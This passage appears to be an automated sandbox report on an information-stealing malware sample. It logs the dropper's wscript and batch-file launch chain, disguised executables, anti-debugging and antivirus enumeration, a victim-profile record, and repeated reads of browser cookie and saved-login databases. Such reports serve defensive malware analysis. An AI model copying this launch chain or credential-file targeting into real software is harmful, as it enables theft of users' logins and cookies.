                          Source: hyperbrokerhostNetsvc.exe, 00000006.00000002.2315348256.000000001C1C5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}D
                          Source: hyperbrokerhostNetsvc.exe, 00000006.00000000.2263404724.0000000000C42000.00000002.00000001.01000000.0000000A.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe0.6.dr, vVSUwBXtljAfFANPiZBBPFzlgh.exe.6.dr, wininit.exe.6.dr, hyperbrokerhostNetsvc.exe.0.drBinary or memory string: qykX1sOLrjsfnXQeMU6l
                          Source: 041SLKctM1.12.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                          Source: 041SLKctM1.12.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                          Source: 041SLKctM1.12.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                          Source: 041SLKctM1.12.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeAPI call chain: ExitProcess graph end nodegraph_0-25137
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCode function: 0_2_007DF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_007DF838
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCode function: 0_2_007E7DEE mov eax, dword ptr fs:[00000030h]0_2_007E7DEE
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCode function: 0_2_007EC030 GetProcessHeap,0_2_007EC030
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCode function: 0_2_007DF9D5 SetUnhandledExceptionFilter,0_2_007DF9D5
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCode function: 0_2_007DFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_007DFBCA
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCode function: 0_2_007E8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_007E8EBD
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeMemory allocated: page read and write | page guardJump to behavior
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\PortCommon\QBVo6vYwcvtPMCVlfk17MWy9WfGX2h.vbe" Jump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\PortCommon\jweBRAt.bat" "Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\PortCommon\hyperbrokerhostNetsvc.exe C:\PortCommon/hyperbrokerhostNetsvc.exeJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Uhg5bQrQMo.bat" Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe "C:\Program Files (x86)\mozilla maintenance service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe" Jump to behavior
                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000538D000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000005781000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000003FD2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000538D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [{"Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"N","Cookies Count (1671)":"44","Passwords Count (1671)":"0","Forms Count (1671)":"?","CC Count (1671)":"?","History Count (1671)":"?"},"5.0.4",5,1,"","user","715575","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Program Files (x86)\\mozilla maintenance service\\logs","23UYDEOU4 (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","154.16.192.203","US / United States","New York / New York","40.7123 / -74.0068"]
                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000005781000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000547C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [{"Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"N","Cookies Count (1671)":"44","Passwords Count (1671)":"0","Forms Count (1671)":"0","CC Count (1671)":"0","History Count (1671)":"?"},"5.0.4",5,1,"","user","715575","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Program Files (x86)\\mozilla maintenance service\\logs","23UYDEOU4 (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","154.16.192.203","US / United States","New York / New York","40.7123 / -74.0068"]
                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000005781000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: .4",5,1,"","user","715575","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Program Files (x86)\\mozilla maintenance service\\logs","23UYDEOU4 (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","154.
                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000005781000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000547C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager`
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCode function: 0_2_007DF654 cpuid 0_2_007DF654
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_007DAF0F
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeQueries volume information: C:\PortCommon\hyperbrokerhostNetsvc.exe VolumeInformationJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeQueries volume information: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCode function: 0_2_007DDF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_007DDF1E
                          Source: C:\Users\user\Desktop\hT7clR9Gz2.exeCode function: 0_2_007CB146 GetVersionExW,0_2_007CB146
                          Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000002B1B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000002B1B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: eC:/Users/All Users\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000002B1B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000351B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000351B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000351B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000002B1B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: TC:/Users/All Users\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000351B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000351B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000002B1B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000002B1B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vC:/Users/All Users\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                          Stealing of Sensitive Information

                          Source: Yara matchFile source: 0000000C.00000002.3259059706.00000000055E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000C.00000002.3259059706.0000000005781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000C.00000002.3259059706.0000000005929000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000006.00000002.2308672698.0000000013281000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000C.00000002.3259059706.0000000002B1B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: hyperbrokerhostNetsvc.exe PID: 5492, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: vVSUwBXtljAfFANPiZBBPFzlgh.exe PID: 4980, type: MEMORYSTR
                          Source: Yara matchFile source: 6.0.hyperbrokerhostNetsvc.exe.c40000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000003.2002850710.0000000006AB7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000006.00000000.2263404724.0000000000C42000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara matchFile source: C:\PortCommon\vVSUwBXtljAfFANPiZBBPFzlgh.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files\Microsoft Office 15\ClientX64\wininit.exe, type: DROPPED
                          Source: Yara matchFile source: C:\PortCommon\hyperbrokerhostNetsvc.exe, type: DROPPED
                          Source: Yara matchFile source: C:\PortCommon\sihost.exe, type: DROPPED
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-walJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shmJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
